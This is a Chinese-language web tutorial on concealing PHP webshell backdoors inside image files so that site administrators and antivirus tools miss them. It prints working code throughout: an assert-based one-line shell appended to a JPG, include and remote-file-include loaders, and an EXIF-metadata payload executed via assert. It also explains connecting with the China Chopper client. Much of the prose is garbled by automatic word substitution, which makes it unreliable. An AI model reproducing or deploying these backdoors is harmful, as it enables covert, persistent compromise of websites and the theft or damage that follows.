|
|
|
联系客服020-83701501

PHP图片后门藏匿攻略

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
PHP图片后门埋没攻略

咱们平时埋没图片后门是甚么流程呢?咱们来看1下

0x01 低级的埋没设施:

 

1、建树1个eval.php文件,上面介入咱们的后门:

Default
<?php assert($_POST[feiji]);?>

2、找1张图片1.jpg,最佳是从方针网站高低载下来的图片。

3、分开图片和php后门:

Default
Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg

四、在任何1个php文件中征求这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:

Default
<?php include (‘2.jpg’); ?>

5、上传2.jpg和images.php,在菜刀里增加1句话后门:http://127.0.0.1/images/images.php,密码为feiji。

 

接见接见会面会面图片畸形:

1

接见接见会面会面images.php页面呈现乱码,可是后门已经畸形运行:

2

可是1句话在菜刀里是概略阐发腐败的:

3

 

注:省去第3步也是概略的,只不过间接接见接见会面会面图片会乱码,会让打点员起困惑。

 

0x02 中级埋没的设施:

 

1、其实即是长途文件征求,也非可是针对图片,哀求你有高权限,梗概使用Apache和批改php.ini文件:

  • 批改ini的设置装备摆设选项allow_url_fopen和allow_url_include为ON。

2、树立任何1个php文件中,以images.php为例,写入以下的代码:

Default
<?php $filename=$_GET['feiji'];include ($filename); ?>

3、方才做的图片后门jpg概略放在此外网站(http://www.xxxx.com)上,在菜刀里增加1句话后门:

http://127.0.0.1/images/images.php?feiji=http://www.xxxx.com/images/2.jpg 密码为feiji

 

注:如许做的甜头是概略随时变卦各种后门,害处是很难失去到高权限。

 

 

0x03 低级的埋没设施

后台常识:

EXIF动态: 是可更动图像文件的缩写,是趁便为数码相机的照片设定的,概略记载数码照片的属性动态和拍摄数据。全部的JPEG文件以字符串“0xFFD8”结尾,并以字符串“0xFFD九”结束。文件头中有1系列“0xFF??”样式的字符串,称为“标识”,用来标记JPEG文件的动态段。“0xFFD8”表示图像动态劈头,“0xFFD九”表示图像动态结束,这两个标识后背不有动态,而此外标识紧跟1些动态字符。

其实即是这个玩意儿:选定图片右键决意属性,在详细动态里面概略看到(win7)

4

1、php里面有1个函数exif_read_data(),概略获得图片的EXIF动态头,可是须要关闭php_exif模块。

2、咱们是概略随意敷衍批改EXIF动态的,比方:

6

这里举荐1个小器材,PowerExif ,下载地点为:

http://www.pc6.com/softview/SoftView_68705.html

免费版概略批改全部EXIF动态头,可是对咱们来说已经充裕了。

打开器材,点击增加,在批改机型动态,如下:

6

增加咱们的PAYLOAD:

73、咱们来调试1下:

Default
123四567 <? $exif = exif_read_data('四60.jpg'); var_dump($exif); ?>

 

输出:

8四、利用设施:

在php脚本上写入:

Default
123四567 <? $exif = exif_read_data ('四60.jpg'); assert($exif['Model']); ?>

 

5、在菜刀上增加http://127.0.0.1/images/images.php 密码为feiji,成绩:

9

 

有同学或者会问,为甚么要使用这种设施埋没图片后门,这个不是和低级的埋没设施等效吗?原因有3:

  • 有教育的打点员1看include文件就会缔造有端倪。
  • 杀软会重点搜查include征求的文件。
  • exif_read_data()函数概略征求长途的JPG文件,也即是等效于1个长途裂痕文件征求咯。

【via@九1ri.org团队】 未经受权,阻止转载!

数安新闻+更多

证书相关+更多